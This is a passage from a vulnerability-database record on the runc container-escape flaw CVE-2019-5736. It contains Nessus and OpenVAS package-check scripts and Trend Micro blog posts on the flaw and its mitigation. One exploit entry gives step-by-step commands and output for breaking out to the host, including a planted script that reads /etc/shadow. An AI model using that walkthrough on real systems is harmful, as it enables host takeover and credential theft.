preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/container-tools');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:rhel8');\nif ('rhel8' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module container-tools:' + module_ver);\n\nappstreams = {\n 'container-tools:rhel8': [\n {'reference':'buildah-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'buildah-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'buildah-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'buildah-debugsource-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'buildah-debugsource-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'buildah-debugsource-1.5-3.gite94b4f9.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'container-selinux-2.94-1.git1e99f1d.module+el8.0.0+2958+4e823551', 'release':'8', 'epoch':'2'},\n {'reference':'containernetworking-plugins-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'containernetworking-plugins-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'containernetworking-plugins-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'containernetworking-plugins-debugsource-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 
'cpu':'aarch64', 'release':'8'},\n {'reference':'containernetworking-plugins-debugsource-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'containernetworking-plugins-debugsource-0.7.4-3.git9ebe139.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'containers-common-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'containers-common-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'containers-common-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'fuse-overlayfs-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'fuse-overlayfs-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'fuse-overlayfs-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'fuse-overlayfs-debugsource-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'fuse-overlayfs-debugsource-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'fuse-overlayfs-debugsource-0.3-2.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-debugsource-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-systemd-hook-debugsource-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 
'epoch':'1'},\n {'reference':'oci-systemd-hook-debugsource-0.1.15-2.git2d0b8a3.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-debugsource-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-debugsource-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'2'},\n {'reference':'oci-umount-debugsource-2.3.4-2.git87f9237.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'2'},\n {'reference':'podman-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'podman-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'podman-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'podman-debugsource-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'podman-debugsource-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'podman-debugsource-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'podman-docker-1.0.0-2.git921f98f.module+el8.0.0+2958+4e823551', 'release':'8'},\n {'reference':'runc-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 'cpu':'aarch64', 'release':'8'},\n {'reference':'runc-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 'cpu':'s390x', 'release':'8'},\n {'reference':'runc-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 
'cpu':'x86_64', 'release':'8'},\n {'reference':'runc-debugsource-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 'cpu':'aarch64', 'release':'8'},\n {'reference':'runc-debugsource-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 'cpu':'s390x', 'release':'8'},\n {'reference':'runc-debugsource-1.0.0-55.rc5.dev.git2abd837.module+el8.0.0+3049+59fd2bba', 'cpu':'x86_64', 'release':'8'},\n {'reference':'skopeo-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-debugsource-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-debugsource-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8', 'epoch':'1'},\n {'reference':'skopeo-debugsource-0.1.32-3.git1715c90.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8', 'epoch':'1'},\n {'reference':'slirp4netns-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'slirp4netns-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'slirp4netns-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'},\n {'reference':'slirp4netns-debugsource-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'aarch64', 'release':'8'},\n {'reference':'slirp4netns-debugsource-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'s390x', 'release':'8'},\n {'reference':'slirp4netns-debugsource-0.1-2.dev.gitc4e1bc5.module+el8.0.0+2958+4e823551', 'cpu':'x86_64', 'release':'8'}\n ],\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n 
appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module container-tools:rhel8');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'buildah / buildah-debugsource / container-selinux / etc');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:07", "description": "\nrunc 1.0-rc6 (Docker 
18.09.2) - Container Breakout (2)", "edition": 1, "published": "2019-02-13T00:00:00", "title": "runc 1.0-rc6 (Docker 18.09.2) - Container Breakout (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-13T00:00:00", "id": "EXPLOITPACK:A525E32FDF6F1ECE16D67E1741C48E11", "href": "", "sourceData": "## CVE-2019-5736 ##\n\nThis is exploit code for CVE-2019-5736 (and it works for both runc and LXC).\nThe simplest way to use it is to copy the exploit code into an existing\ncontainer, and run `make.sh`. However, you could just as easily create a bad\nimage and run that.\n\n```console\n% docker run --rm --name pwnme -dit ubuntu:18.10 bash\npwnme\n% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar\n```\n\nWe need to install `gcc` to build the exploit, and `runc` because we need to\nhave the shared libraries that `runc` would use. We don't actually use the\n`runc` binary itself. For LXC, you would install `lxc` instead of `runc`.\n\n```console\n% docker attach pwnme\n# apt-get update && apt-get install -y gcc runc\n[ snip ]\n# tar xf CVE-2019-5736.tar\n# ./CVE-2019-5736/make.sh\n```\n\nAnd now, `/bin/bash` in the container will be able to **overwrite the host runc\nbinary**. 
Since this binary is often executed by `root`, this allows for\nroot-level code execution on the host.\n\n```\n% docker exec -it pwnme /bin/bash\n[+] bad_libseccomp.so booted.\n[+] opened ro /proc/self/exe <3>.\n[+] constructed fdpath </proc/self/fd/3>\n[+] bad_init is ready -- see </tmp/bad_init_log> for logs.\n[*] dying to allow /proc/self/exe to be unused...\n% cat /usr/sbin/docker-runc\n#!/bin/bash\ntouch /w00t_w00t ; cat /etc/shadow\n```\n\nAnd now if you try to use Docker normally, the malicious script will execute\nwith root privileges:\n\n```\n% docker exec -it pwnme /bin/good_bash\nOCI runtime state failed: invalid character 'b' looking for beginning of value: unknown\n% file /w00t_w00t\n/w00t_w00t: empty\n```\n\nAnd obviously `make.sh` can be modified to make the evil path anything you\nlike. If you want to get access to the container, use `/bin/good_bash`.\n\n### License ###\n\n```\nCopyright (C) 2019 Aleksa Sarai <cyphar@cyphar.com>\nVulnerability discovered by Adam Iwaniuk and Borys Pop\u0142awski.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to\ndeal in the Software without restriction, including without limitation the\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\nsell copies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\n* The above copyright notice and this permission notice shall be included in\n all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\n```\n\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2019-03-01T16:18:24", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how a group of hackers is stealing popular Instagram profiles. Also, learn about old and new cybersecurity issues inundated enterprises in 2018.\n\nRead on:\n\n[**Insecure VPNs: Top risks and symptoms that stronger security is needed**](<https://blog.trendmicro.com/insecure-vpns-top-risks-and-symptoms-that-stronger-security-is-needed/>)\n\n_While users hope and expect that VPNs will live up to their name and truly support a virtual and private connection, research shows that this is not always the case._** **\n\n[**U.S. Cyber Command Operation Disrupted Internet Access of Russian Troll Factory on Day of 2018 Midterms**](<https://www.washingtonpost.com/world/national-security/us-cyber-command-operation-disrupted-internet-access-of-russian-troll-factory-on-day-of-2018-midterms/2019/02/26/1827fc9e-36d6-11e9-af5b-b51b7ff322e9_story.html?noredirect=on&utm_term=.910d209f6acb>)\n\n_The U.S. 
military blocked Internet access to an infamous Russian entity seeking to cause discord among Americans during the 2018 midterms._** **\n\n[**How a Hacking Group is Stealing Popular Instagram Profiles**](<https://blog.trendmicro.com/trendlabs-security-intelligence/how-a-hacking-group-is-stealing-popular-instagram-profiles/>)\n\n_Trend Micro found that targeting popular Instagram profiles has become a modus for a certain group of Turkish-speaking hackers through phishing attacks and digital extortion._** **\n\n[**Attackers Continue to Focus on Users, Well-Worn Techniques**](<https://www.darkreading.com/threat-intelligence/attackers-continue-to-focus-on-users-well-worn-techniques/d/d-id/1333960>)\n\n_According to Trend Micro\u2019s 2018 Roundup Report, traditional attacks such as phishing and credential stuffing continue to dominate the threat landscape for most industries while well-known malware remain a threat for behind-the-curve companies._** **\n\n[**CVE-2019-5736: RunC Container Escape Vulnerability Provides Root Access to the Target Machine**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/cve-2019-5736-runc-container-escape-vulnerability-provides-root-access-to-the-target-machine>)\n\n_CVE-2019-5736 is a vulnerability involving the runC runtime component, which is used for container platforms such as Docker and container orchestration platforms such as Kubernetes._** **\n\n[**Congress Considers a National Standard for Data Privacy**](<https://www.zdnet.com/article/congress-considers-a-national-standard-for-data-privacy/>)\n\n_The conversations on nationwide data privacy rules kicked off with a hearing in a subpanel of the House Energy and Commerce Committee._** **\n\n[**Caught in the Net: Unraveling the Tangle of Old and New Threats**](<https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/unraveling-the-tangle-of-old-and-new-threats>)\n\n_Trend Micro saw a shift in cybercriminal strategies 
and lingering security threats. Enterprises faced a multitude of challenges, but careful study of these issues can present opportunities for improvement.__ _\n\n**[Europe is Prepared to Rule Over 5G Cybersecurity](<https://techcrunch.com/2019/02/25/europe-is-prepared-to-rule-over-5g-cybersecurity/>)**\n\n_At Mobile World Congress, the European Commission\u2019s digital commissioner warned the mobile industry to expect it to act over security concerns attached to Chinese network equipment makers, including Huawei._\n\nDo you think there will be more attacks on high-profile social media accounts or influencers this year? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Instagram Hackers and Enterprise Threats](<https://blog.trendmicro.com/this-week-in-security-news-instagram-hackers-and-enterprise-threats/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-03-01T14:57:50", "published": "2019-03-01T14:57:50", "id": "TRENDMICROBLOG:A8C47E018FA9A3D0723FC3A99FD592A7", "href": "https://blog.trendmicro.com/this-week-in-security-news-instagram-hackers-and-enterprise-threats/", "type": "trendmicroblog", "title": "This Week in Security News: Instagram Hackers and Enterprise Threats", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-20T09:44:48", "bulletinFamily": "blog", "cvelist": ["CVE-2019-5736"], "description": "\n\nThis week a new vulnerability was published ([CVE-2019-5736](<https://nvd.nist.gov/vuln/detail/CVE-2019-5736>)) that highlights everything bad and good about containers. Simply put, this vulnerability can be exploited using an infected container to attack the host. 
It\u2019s a real world example of a breakout attack that has long been a major concern in virtualized and container environments.\n\nHere, the attack highlights the biggest security weakness of containers: they are loosely isolated sharing the same host operating system. This is in stark contrast to virtual machines which are isolated instances of a complete operating system.\n\n## CVE-2019-5736\n\nThe vulnerability itself can be exploited by an attacker using a custom container or by gaining write access to an existing container. They then can manipulate the symbolic process link (/proc/self/exe/) in order to overwrite the runC binary. [runC](<https://github.com/opencontainers/runc>) is a portable, lightweight container runtime. It\u2019s a critical piece of container infrastructure.\n\nIn this attack, once runC is overwritten and under the attacker\u2019s control, they own the host and\u2014potentially\u2014any container running on it.\n\nThat\u2019s a devastating foothold and is why this vulnerability has a CVSSv3 score of 7.2 or \u201chigh\u201d. A score this high means that you should mitigate or fix the vulnerability as soon as possible.\n\n> For Trend Micro customers using Deep Security to protect their container hosts, [this knowledge base article](<https://success.trendmicro.com/solution/1122066>) explains the rules that you can use to both detect and prevent this issue until you have the opportunity to deploy a patch to your infrastructure.\n\n## A Container Refresher\n\nWhen reading about a vulnerability like this, the natural question to ask is, \u201cWhy isn\u2019t there a firmer line between containers on the same host?\u201d. The answer is a complicated one.\n\nTo start with, containers are not designed to solve security challenges. They were designed to tackle a very specific development challenge: dependency nightmares.\n\nAny application you write is built on layers of other teams\u2019 code. 
Whether it\u2019s the framework you\u2019re using directly, standard libraries provided by your programming language, services made available by the OS, or even resources provided in hardware, your code does not stand alone.\n\nThis leads to a web of interdependencies and requirements for your code to run. For a very long time, developers faced a challenge documenting all of these dependencies and ensuring they were met in production environments.\n\nIf you\u2019ve ever heard a developer exclaim, \u201cIt worked on my machine!\u201d, you understand the problem.\n\nContainers were designed to make it easy to package all of an application\u2019s dependencies in a portable fashion. This helps with deployment, versioning, and a number of other delivery challenges.\n\nIn this respect containers are a fantastic step forward for developer efficiency.\n\n## The Downside of Containers\n\nThis efficiency for developers comes at the cost of infrastructure complexity. Often overlooked is the security of the container host, network complexity, and the integrity of the build pipeline.\n\nIn the case of CVE-2019-5736, the container host\u2019s security is paramount. Hardening the host\u2019s operating system by reducing the number of available services\u2014it should only run the container runtime, host security controls, and host monitoring applications\u2014to the bare minimum is critical to security success.\n\nFurthermore, using security controls like integrity monitoring, log inspection, and application control will ensure that your hardened configuration **stays** that way.\n\nThis vulnerability demonstrates that each container can be a risk to the host. The easiest analogy here comes from noted container expert [Kelsey Hightower](<https://twitter.com/kelseyhightower?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), he compared virtual machines to single houses (isolated, rarely impacting their neighbours) and containers to apartments. 
If your upstairs neighbour is always banging on the floor, you have a problem.\n\nCVE-2019-5736 is the distinct possibility of having a neighbour who throws a crazy party that trashes not only their own apartment but the hall, elevator, and lobby. Everyone has to deal with that mess.\n\n## The Upside\n\nThis issue also demonstrates the upside of the container model. Containers are designed for a highly automated and dynamic environment. In order to resolve this issue, the container runtime will need to be protected and then patched.\n\nThese measures may impact the availability of each host. The advantage? You can simply spin up a new version of your container on an already protected or patched host.\n\nTake for example the list of [affected AWS services](<https://aws.amazon.com/security/security-bulletins/AWS-2019-002/>). In each of these cases, [a rolling update](<https://www.dropbox.com/sh/3vm31z18xrhvm2k/AABAHh7jwu2u1u7rpK4XZrf6a?dl=0>) or blue/green deployment is possible in order to address the issue without impacting your users.\n\nIf your CI/CD pipeline is set up\u2014and if you\u2019re using containers, it should be\u2014a simple re-deployment to known good hosts will mitigate the issue. This is a prime example of the advantages of a highly automated build pipeline.\n\nNo special processes are required. Simply mitigate or patch the hosts and run your build again. DevOps culture FTW.\n\n## Next Steps\n\nThis won\u2019t be the last security issue in your container environment. Containers were designed to improve developer efficiency. Security is a priority for the teams working on the projects\u2014like runC\u2014that make containers work but there will always be security issues that pop up.\n\nIf you\u2019re following best practices and have automated your build and deployment pipeline, these issues shouldn\u2019t impact your end users. 
At worst, it should mean adding a new security rule or two to your tool set, adding a new security test to your build (to prevent recurrence), and a rolling update.\n\nIt\u2019s also a reminder that the security of your container host is **paramount** to the security of your container infrastructure. Take this opportunity to review the security posture of these hosts and if you haven\u2019t already, deploy a strong set of security controls that include [integrity monitoring](<https://en.wikipedia.org/wiki/File_integrity_monitoring>) and [application control](<https://en.wikipedia.org/wiki/Whitelisting#Application_whitelists>).\n\nThe post [Attacking Containers and runC](<https://blog.trendmicro.com/attacking-containers-and-runc/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-02-12T19:22:35", "published": "2019-02-12T19:22:35", "id": "TRENDMICROBLOG:DD93FD0A6FE52A3DFF89C6F550E981D1", "href": "https://blog.trendmicro.com/attacking-containers-and-runc/", "type": "trendmicroblog", "title": "Attacking Containers and runC", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:32:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875688", "type": "openvas", "title": "Fedora Update for runc FEDORA-2019-3f19f13ecd", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software 
Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875688\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:16:13 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for runc FEDORA-2019-3f19f13ecd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-3f19f13ecd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3UBRCQV7DJSPM4I25KSQILXWKNX37F5I\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'runc'\n package(s) announced via the FEDORA-2019-3f19f13ecd advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The runc command can be used to start containers which 
are packaged\nin accordance with the Open Container Initiative', s specifications,\nand to manage containers running under runc.\");\n\n script_tag(name:\"affected\", value:\"'runc' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"runc\", rpm:\"runc~1.0.0~68.dev.git6635b4f.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:46:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876767", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876767", "type": "openvas", "title": "Fedora Update for lxcfs FEDORA-2019-c1dac1b3b8", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876767\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:06 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for lxcfs FEDORA-2019-c1dac1b3b8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-c1dac1b3b8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/744HVBCKN5JUL3CHQ24OQUR76WXCYQ2W\");\n\n script_tag(name:\"summary\", value:\"The 